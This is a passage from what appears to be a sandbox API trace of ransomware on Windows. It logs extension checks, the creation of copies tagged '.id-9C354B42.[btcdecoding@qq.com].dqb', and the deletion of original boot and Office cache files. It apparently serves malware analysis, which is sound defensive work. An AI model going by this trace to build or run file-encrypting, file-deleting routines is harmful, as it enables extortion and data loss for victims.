lpString2=".LOG") returned -1 [0032.923] lstrlenW (lpString=".7z") returned 3 [0032.923] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0032.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.923] lstrlenW (lpString=".dbf") returned 4 [0032.923] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0032.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.924] lstrlenW (lpString=".1cd") returned 4 [0032.924] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0032.924] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.924] lstrlenW (lpString=".jpg") returned 4 [0032.924] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0032.924] lstrcmpiW (lpString1=".DAT", lpString2=".dqb") returned -1 [0032.924] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0032.924] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0032.924] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=65536) returned 1 [0032.924] CloseHandle (hObject=0x174) returned 1 [0032.924] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0032.924] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.925] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0032.925] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.925] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.925] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0032.925] GetLastError () returned 0x0 [0032.925] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x10000, lpOverlapped=0x0) returned 1 [0032.928] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x10010, lpOverlapped=0x0) returned 1 [0032.929] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0032.929] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0032.929] SetEndOfFile (hFile=0x178) returned 1 [0032.930] CloseHandle (hObject=0x178) returned 1 [0032.931] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.931] SetEndOfFile (hFile=0x174) returned 1 [0032.932] CloseHandle (hObject=0x174) returned 1 [0032.932] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x26) returned 1 [0032.932] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0032.932] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.932] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.932] lstrlenW (lpString=".doc") returned 4 [0032.932] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0032.932] lstrlenW (lpString=".docx") returned 5 [0032.932] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0032.932] lstrlenW (lpString=".pdf") returned 4 [0032.932] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString=".xls") returned 4 [0032.933] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString=".xlsx") returned 5 [0032.933] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0032.933] lstrlenW (lpString=".ppt") returned 4 [0032.933] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.933] lstrlenW (lpString=".zip") returned 4 [0032.933] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString=".rar") returned 4 [0032.933] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString=".bz2") returned 4 [0032.933] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0032.933] lstrlenW (lpString=".7z") returned 3 [0032.933] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0032.933] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.933] lstrlenW (lpString=".dbf") returned 4 [0032.933] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.933] lstrlenW (lpString=".1cd") returned 4 [0032.933] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0032.933] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.933] lstrlenW (lpString=".jpg") returned 4 [0032.933] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.933] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.933] lstrlenW (lpString=".doc") returned 4 [0032.933] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString=".docx") returned 5 [0032.933] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0032.933] lstrlenW (lpString=".pdf") returned 4 [0032.933] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString=".xls") returned 4 [0032.933] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0032.933] lstrlenW (lpString=".xlsx") returned 5 [0032.933] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0032.934] lstrlenW (lpString=".ppt") returned 4 [0032.934] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0032.934] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.934] lstrlenW (lpString=".zip") returned 4 [0032.934] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0032.934] lstrlenW (lpString=".rar") returned 4 [0032.934] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0032.934] lstrlenW (lpString=".bz2") returned 4 [0032.934] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0032.934] lstrlenW (lpString=".7z") returned 3 [0032.934] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0032.934] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.934] lstrlenW (lpString=".dbf") returned 4 [0032.934] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0032.934] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.934] lstrlenW (lpString=".1cd") returned 4 [0032.934] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0032.934] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0032.934] lstrlenW (lpString=".jpg") returned 4 [0032.934] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0032.934] lstrcmpiW (lpString1=".BAK", lpString2=".dqb") returned -1 [0032.934] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0032.934] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0032.935] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=8192) returned 1 [0032.935] CloseHandle (hObject=0x174) returned 1 [0032.935] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0032.935] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\bootsect.bak.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.935] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0032.935] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0032.936] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.936] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.936] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\bootsect.bak.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0032.936] GetLastError () returned 0x0 [0032.936] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x2000, lpOverlapped=0x0) returned 1 [0033.161] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2010, lpOverlapped=0x0) returned 1 [0033.162] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0033.162] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0033.162] SetEndOfFile (hFile=0x178) returned 1 [0033.163] CloseHandle (hObject=0x178) returned 1 [0033.163] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.163] SetEndOfFile (hFile=0x174) returned 1 [0033.164] CloseHandle (hObject=0x174) returned 1 [0033.164] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x27) returned 1 [0033.326] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0033.327] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.327] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.327] lstrlenW (lpString=".doc") returned 4 [0033.327] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0033.327] lstrlenW (lpString=".docx") returned 5 [0033.327] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0033.327] lstrlenW (lpString=".pdf") returned 4 [0033.327] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0033.327] lstrlenW (lpString=".xls") returned 4 [0033.327] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0033.327] lstrlenW (lpString=".xlsx") returned 5 [0033.327] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0033.327] lstrlenW (lpString=".ppt") returned 4 [0033.327] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0033.327] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.327] lstrlenW (lpString=".zip") returned 4 [0033.327] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0033.327] lstrlenW (lpString=".rar") returned 4 [0033.327] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0033.327] lstrlenW (lpString=".bz2") returned 4 [0033.327] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0033.327] lstrlenW (lpString=".7z") returned 3 [0033.327] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0033.327] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.327] lstrlenW (lpString=".dbf") returned 4 [0033.327] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0033.327] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.327] lstrlenW (lpString=".1cd") returned 4 [0033.327] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0033.327] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.327] lstrlenW (lpString=".jpg") returned 4 [0033.327] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0033.328] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.328] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.328] lstrlenW (lpString=".doc") returned 4 [0033.328] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0033.328] lstrlenW (lpString=".docx") returned 5 [0033.328] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0033.328] lstrlenW (lpString=".pdf") returned 4 [0033.328] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0033.328] lstrlenW (lpString=".xls") returned 4 [0033.328] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0033.328] lstrlenW (lpString=".xlsx") returned 5 [0033.328] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0033.328] lstrlenW (lpString=".ppt") returned 4 [0033.328] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0033.328] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.328] lstrlenW (lpString=".zip") returned 4 [0033.328] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0033.328] lstrlenW (lpString=".rar") returned 4 [0033.328] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0033.328] lstrlenW (lpString=".bz2") returned 4 [0033.328] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0033.328] lstrlenW (lpString=".7z") returned 3 [0033.328] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0033.328] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.328] lstrlenW (lpString=".dbf") returned 4 [0033.328] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0033.328] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.328] lstrlenW (lpString=".1cd") returned 4 [0033.328] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0033.328] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.328] lstrlenW (lpString=".jpg") returned 4 [0033.328] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0033.328] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0033.328] lstrlenW (lpString="OutlookMUI.xml") returned 14 [0033.329] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0033.330] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=3186) returned 1 [0033.330] CloseHandle (hObject=0x19c) returned 1 [0033.330] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 0x2020 [0033.330] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0033.330] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0033.330] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.330] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.330] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0033.330] GetLastError () returned 0x0 [0033.330] ReadFile (in: hFile=0x19c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xc72, lpOverlapped=0x0) returned 1 [0033.412] WriteFile (in: hFile=0x1a0, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xc80, lpOverlapped=0x0) returned 1 [0034.204] ReadFile (in: hFile=0x19c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.205] WriteFile (in: hFile=0x1a0, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.205] SetEndOfFile (hFile=0x1a0) returned 1 [0034.205] CloseHandle (hObject=0x1a0) returned 1 [0034.206] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.206] SetEndOfFile (hFile=0x19c) returned 1 [0034.206] CloseHandle (hObject=0x19c) returned 1 [0034.206] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.207] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 1 [0034.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.207] lstrlenW (lpString=".doc") returned 4 [0034.207] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.207] lstrlenW (lpString=".docx") returned 5 [0034.207] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.207] lstrlenW (lpString=".pdf") returned 4 [0034.207] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.207] lstrlenW (lpString=".xls") returned 4 [0034.207] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.207] lstrlenW (lpString=".xlsx") returned 5 [0034.207] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.207] lstrlenW (lpString=".ppt") returned 4 [0034.207] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.207] lstrlenW (lpString=".zip") returned 4 [0034.207] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.207] lstrlenW (lpString=".rar") returned 4 [0034.207] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.207] lstrlenW (lpString=".bz2") returned 4 [0034.207] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString=".7z") returned 3 [0034.208] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.208] lstrlenW (lpString=".dbf") returned 4 [0034.208] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.208] lstrlenW (lpString=".1cd") returned 4 [0034.208] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.208] lstrlenW (lpString=".jpg") returned 4 [0034.208] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.208] lstrlenW (lpString=".doc") returned 4 [0034.208] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString=".docx") returned 5 [0034.208] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.208] lstrlenW (lpString=".pdf") returned 4 [0034.208] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString=".xls") returned 4 [0034.208] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString=".xlsx") returned 5 [0034.208] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.208] lstrlenW (lpString=".ppt") returned 4 [0034.208] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.208] lstrlenW (lpString=".zip") returned 4 [0034.208] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.208] lstrlenW (lpString=".rar") returned 4 [0034.208] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString=".bz2") returned 4 [0034.208] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.208] lstrlenW (lpString=".7z") returned 3 [0034.209] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.209] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.209] lstrlenW (lpString=".dbf") returned 4 [0034.209] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.209] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.209] lstrlenW (lpString=".1cd") returned 4 [0034.209] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.209] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.209] lstrlenW (lpString=".jpg") returned 4 [0034.209] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.209] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.209] lstrlenW (lpString="Setup.xml") returned 9 [0034.209] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.209] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2424) returned 1 [0034.209] CloseHandle (hObject=0x19c) returned 1 [0034.209] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.209] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.210] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.210] SetFilePointerEx (in: hFile=0x19c, 